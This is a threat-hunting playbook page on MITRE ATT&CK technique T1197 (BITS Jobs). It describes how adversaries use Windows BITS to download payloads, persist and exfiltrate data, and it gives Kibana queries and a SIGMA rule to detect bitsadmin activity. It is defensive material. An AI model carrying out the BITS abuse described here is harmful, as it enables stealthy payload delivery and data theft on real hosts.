# T1197 BITS Jobs

-----------------------------------------------------------------------

## Technique Description

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

## Technique Detection

BITS runs as a service and its status can be checked with the Sc query utility (<code>sc query bits</code>).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (<code>bitsadmin /list /allusers /verbose</code>).(Citation: Microsoft BITS)

Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)

Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)

-----------------------------------------------------------------------

### Tactics:

  * Defense-Evasion

  * Persistence

### Platforms:

  * Windows

### Adversary Required Permissions:

  * User

  * Administrator

  * SYSTEM

### Defenses Bypassed:

  * Firewall

  * Host forensic analysis

### Data Sources:

  * **Process:** Process Creation

  * **Network Traffic:** Network Connection Creation

  * **Command:** Command Execution

  * **Service:** Service Metadata

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|
| APT41 | [APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)| 
| APT39 | [APT39](https://attack.mitre.org/groups/G0087) has used the BITS protocol to exfiltrate stolen data from a compromised host.(Citation: FBI FLASH APT39 September 2020)| 
| Leviathan | [Leviathan](https://attack.mitre.org/groups/G0065) has used [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional tools.(Citation: FireEye Periscope March 2018)| 
| Patchwork | [Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020)| 
-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1197)

  * [Microsoft Com](https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx), Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.

  * [Microsoft Bits](https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx), Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.

  * [Microsoft Bitsadmin](https://msdn.microsoft.com/library/aa362813.aspx), Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.

  * [Ctu Bits Malware June 2016](https://www.secureworks.com/blog/malware-lingers-with-bits), Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.

  * [Mondok Windows Piggyback Bits May 2007](https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/), Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.

  * [Symantec Bits May 2007](https://www.symantec.com/connect/blogs/malware-update-windows-update), Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.

  * [Paloalto Uboatrat Nov 2017](https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/), Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.

  * [Microsoft Issues With Bits July 2011](https://technet.microsoft.com/library/dd939934.aspx), Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.

  * [Elastic - Hunting For Persistence Part 1](https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1), French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is ran. Store permanent information in one of the relevant cells below*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated  Date:** 8 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- N/A

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

## Detection Blindspots

- Network IOCs will only be visible if the BITs job was executed during collection. 
- Due to this tool being used for multiple purposes common SIGMA signatures do not identify all possibly  manipulations of the program. They are a good start for identifying process execution, but they commonly rely on command line arguments that can be easily spoofed or altered to evade signature detection.
- There is also the possibility of an adversary crafting a custom C# script to interface with the BITs COM interface to schedule a file download not using the "bitsadmin.exe" or Powershell cmdlet at all. This of course would leave other artifacts, but bypass the current detections demonstrated.

## Analytical References

  * [Emporal Persistence with and schtasks 2014 (blogspot)](https://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html)
  * [Using BITS (microsoft)](https://docs.microsoft.com/en-us/windows/win32/bits/using-bits)
  * [BITS Sample Download (microsoft)](https://docs.microsoft.com/en-us/windows/win32/bits/bits-dot-net#quick-sample-download-a-file)
  * [Backdoor Stealth Falcon Group 2019 (welivesecurity)](https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/)
  * [Latest Astaroth Living off the Land Attacks 2020 (microsoft)](https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/)
  * [Attack Detection Fundamentals - Code Execution and Persistence (f-secure)](https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/)

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- BITS can be used for downloading, copying, execution, and persistence

#### Analytic 1

  * **Information:** BITSAdmin Download

  * **Source:** Windows Audits, Sysmon

  * **Tool:**  Kibana

  * **Notes:** 

  * **Query:** ```event_id: 1 and process_command_line: *bitsadmin*```
  * **Query:** ```event_id: 4688 and process_command_line: *bitsadmin*```

#### Analytic 2

  * **Information:** BITSAdmin via PowerShell

  * **Source:** Windows Audits, Sysmon

  * **Tool:**  Kibana

  * **Notes:** 

  * **Query:** ```powershell.command.name: *Bits*```



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

- The BITSAdmin client also has a User Agent of "BITS". Ingesting web proxy logs, filtering on this User Agent would allow you to identify all hosts talking externally with this LOLBin.

```
Example of Network SIGMA signature for Bitsadmin connections to domains with uncommon TLDs:

detection:
    selection:
        c-useragent:
            - 'Microsoft BITS/*'
    falsepositives:
        r-dns:
            - '*.com' 
            - '*.net' 
            - '*.org' 
    condition: selection and not falsepositives
```

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```



